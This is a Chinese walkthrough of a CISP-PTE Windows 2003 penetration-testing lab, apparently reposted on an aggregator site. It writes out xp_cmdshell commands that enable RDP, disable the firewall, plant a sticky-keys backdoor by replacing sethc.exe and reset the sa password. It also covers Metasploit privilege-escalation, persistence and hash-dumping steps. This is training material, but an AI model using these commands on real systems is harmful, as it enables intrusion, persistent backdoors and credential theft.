為方便后續(xù)操作，建議和kali在同一網段。
獲取到靶機IP后，掃描端口，1433是sqlserver的

測出用戶名admin，但是密碼爆破失敗
掃描目錄發(fā)現配置文件
配置文件中找到數據庫的用戶名和密碼
使用Microsoft SQL Server Studio連接，注意此時不是sa用戶
數據庫中找到密碼，成功登錄
嘗試上傳文件，但是黑名單限制較死，看到里面已經有人上傳上去，應該是圖片上傳上去繞過，點擊下載查看連接密碼
拿到服務賬戶的權限，與Users賬戶的權限相同。想辦法遠程桌面上去
收集信息，查看網絡連接情況，看到3389沒開
windows平臺一般都有防火墻，netsh firewall show state查看防火墻狀態(tài)

netsh firewall set opmode mod=disable拒絕訪問，權限不夠關不了
利用數據庫操作命令關閉系統(tǒng)防火墻，但是咱們不是sa 用戶沒有權限
而且也沒有xp_cmdshell組件，權限不夠也無法執(zhí)行上傳組件的操作
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Users\Administrator\Desktop\xplog70\xplog70.dll’
擁有sa（管理員）權限，開啟xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

EXEC master.dbo.xp_cmdshell ‘REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
EXEC master.dbo.xp_cmdshell ‘netsh firewall set opmode disable’
EXEC master.dbo.xp_cmdshell ‘cd C:\WINDOWS\system’
EXEC master.dbo.xp_cmdshell ‘copy cmd.exe c:\WINDOWS\system\sethc.exe’
EXEC master.dbo.xp_cmdshell ‘netstat -an’
修改sa密碼 exec sp_password NULL, ‘pasw’, ‘sa’
嘗試提權

https://www.hacking8.com/mst-sec-lecture-notes/8.html
使用multi/recon/local_exploit_suggeser模塊查看靶機可以利用的漏洞以及相應的模塊
使用第一個模塊嘗試，target默認windows 7
提權成功
權限維持，使用windows/local/persistence模塊快速進行權限維持
導出hash值
復制管理員hash拿去解密或者使用john破解
獲取到密碼后，接下來就去開啟3389端口遠程桌面過去
本來咱們獲取到管理員權限后可以直接執(zhí)行命令，但是shell返回不了，聽說原因有很多
這里使用msf的post/windows/manage/enable_rdp模塊開啟，這個模塊好像也可以創(chuàng)新新的遠程桌面用戶
nmap掃描3389是否開啟,或者nc -v ip 端口
使用kali自帶的rdesktop或者物理機遠程mstsc
之前咱們看到系統(tǒng)有防火墻，msf搜索有沒有關閉防火墻的模塊，但是好像沒有
post/windows/manage/exec_powershell利用此模塊執(zhí)行powershell命令失敗
exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
使用第二個模塊重新反彈一個高權限的shell
反彈的shell還是不能進去
看看meterpreter命令有沒有可用的點，meterpreter命令https://www.cnblogs.com/backlion/p/9484949.html
search -f cmd.exe搜索文件
execute -H -i -f cmd.exe代替shell嘗試獲取終端權限
可以上傳反彈的木馬，然后利用execute執(zhí)行反彈回來，執(zhí)行的時候失敗，太菜
使用vnc,run vnc打開遠程桌面失敗
查看本地用戶組
查看遠程桌面用戶發(fā)現為空

嘗試將管理員添加進遠程桌面用戶組里面
有域控的話倒是可以將用戶添加到組里面
run getgui -e可以看到RDP已經啟用
run getgui -u admin -p admin添加賬號
post/windows/manage/killav模塊只能殺防護軟件，不能搞防火墻
"">net localgroup "Remote Desktop Users"看到已經成功將admin用戶添加進遠程用戶組
rdesktop -u admin -p admin 192.168.1.119:3389連接還是失敗，感覺是防火墻攔了
現在雖然拿到系統(tǒng)權限，但是拿不到控制臺權限，也就無法關閉防火墻。咱們雖然有管理員賬號密碼，但是咱們不能直接去登錄靶機，要是這樣就簡單了，咱們得用搞遠程的方式來搞它！
不夠好在有數據庫，可以去拿到數據庫sa的密碼，登錄后執(zhí)行數據庫操作繼而來關閉防火墻。
爆破sa用戶密碼，但是無數字典過后還是一無所獲。
修改遠程桌面端口為27689的端口，也就是靶機開放的web端口
協(xié)議不對應，也不行，防火墻只開了1433和27689，控制臺權限拿不了關不了防火墻。sa用戶密碼爆破不出來，系統(tǒng)庫中sa的hash也為NULL。
key3:4d9d3q8v，admin:asdadwn_d2112用這些密碼登錄sa失敗。嘗試其他模塊。
第三個模塊windows/local/ms14_070_tcpip_ioctl用來提權到system
第四個exploit/windows/local/ms15_051_client_copy_image也是提權
剩下的幾個網上搜了一下也都是提權的 模塊，看來防火墻終究是關不了，還是太菜！
meterpreter能獲取，但是shell獲取不到，sa密碼不知道也爆破不出來，防火墻關不掉，知道怎么關的師傅還望不吝賜教！文章來源地址http://www.zghlxwxcb.cn/news/detail-490798.html

到了這里，關于CISP-PTE-Windows2003教程的文章就介紹完了。如果您還想了解更多內容，請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網！